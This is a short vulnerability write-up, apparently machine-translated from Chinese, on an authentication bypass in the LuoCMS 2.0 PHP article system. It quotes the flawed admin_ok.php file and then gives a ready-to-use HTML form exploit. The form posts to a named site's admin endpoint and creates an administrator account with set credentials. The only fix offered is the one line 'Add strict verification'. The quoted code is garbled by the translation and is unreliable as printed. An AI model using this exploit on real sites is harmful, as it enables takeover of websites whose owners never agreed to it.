Luocms 2.0 add administrator vulnerabilities and fix them... POST EXP

LUOCMS is an article management system based on PHP + MYSQL. It is simple and easy to use. It adopts the DIV + CSS architecture and HTML-based whole site. It has a good internal structure and is more suitable for website optimization and promotion.

The author's idea is that users can directly view the file and verify the session without displaying anything...
Still look at the code
Adminmanageradmin_ OK .php

<? Php
Require_once.../../inc/const. php; //
// Check whether the session (username) exists... is missing from other files ......
$ Act = trim ($ _ GET [act]); // do not parse
$ Id = getvar (id); // getvar defines addslashes to filter this object.
// Add data
If ($ act = add ){
If (check_username ($ _ POST [username]) {
Exit ("<script> alert (user". $ _ POST [username]. "already exists !); Window. history. go (-1) </script> "); // verify the same Administrator name
}

$ Record = array (
Username => $ _ POST [username],
Password => md5 ($ _ POST [password]),
Addtime => date ("Y-m-d H: I: s "),
Supermanager => $ _ SESSION [supermanager] + 1
); // It does not matter if supermanager is not parsed.
$ Id = $ db-> insert ($ GLOBALS [databasePrefix]. manager, $ record); // directly writes data to the database
Echo "<script> alert (added successfully !); Window. location = admin_manage.php; </script> ";
}
// If the following code is omitted, it is modified and deleted.

POST EXP

<Form method = "post" action ="Http://www.hackqing.com/admin/manager/admin_ OK .php? Act = add"Enctype =" multipart/form-data "id =" upload ">
<Label>
<Input name = "username" type = "text" value = "qing"/>
</Label>
<Label>
<Input name = "password" type = "text" value = "qing520"/>
</Label>
<Div> </div>
<Input name = "respondids" value = "confirm to modify" class = "coolbg np" type = "submit">
</Form>

It is not just about backing up the database but also adding news that users do not need to verify what they don't see...

Program:
Local download:Http://www.luocms.com/down/luocms_V1.100606_UTF8.rar

Download the red/Black Alliance:Html> http://www.bkjia.com/ym/201011/24742.html

Author: Mind, edited by emotion

Fix: Add strict verification